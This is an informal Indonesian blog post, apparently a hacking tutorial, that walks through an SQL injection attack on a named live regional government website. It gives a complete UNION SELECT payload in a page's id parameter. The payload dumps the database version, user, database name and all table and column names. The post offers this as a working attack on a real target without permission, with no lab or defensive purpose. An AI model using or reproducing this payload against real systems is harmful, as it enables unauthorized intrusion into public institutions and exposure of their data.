Malemm gan lagi gx ada kerjaan nih yaudah bikin tutor aja :v lagian jenuh ajigg 10 hari libur sekolah mana sekarang males bikin tutor karna mood w lagi zeeb sangad w mau bikin tutor sql challange mungkin udah gx asing lagi di telinga para injektor okay langsung aja ke tutorial
Live target nya kota gue sendiri :v yaitu : http://sukabumikab.go.id/ :v
Nah yang kita perlukan ada lah mencari angka ajaib di sebuah web yang vuln sql injection :v
dah taukan cara nya kalo gx tau baca di sini nah di situ tutor nya :v
kebetulan gue dah dape angka ajaib nya yaitu di angka 3 liat gambar
Keliatan kan :V setelah itu kita tambah kan perintah :v
concat('<font color=red size=4>Di sini nama Lu<br> ',version(),'<br>',user(),'<br>',database(),(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(table_schema=database())and(@:=concat(@,'<br>','<font color=green size=3>',table_name,'</font> ',' :: ','<font color=blue size=3>',column_name))),@))))
perintah di simpen di angka tiga tadi :V jadi kek gini
sukabumikab.go.id/ok/page.php?id=-5'+union+select+1,2,concat('<font color=red size=4>Di sini nama Lu<br> ',version(),'<br>',user(),'<br>',database(),(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(table_schema=database())and(@:=concat(@,'<br>','<font color=green size=3>',table_name,'</font> ',' :: ','<font color=blue size=3>',column_name))),@)))),4,5,6,7+--+
nahh seperti ituu :v nanti hasil nya kek di bawah :
Semoga harii kelen menyenangkan :v
zeebb sagnatt :v
ReplyDelete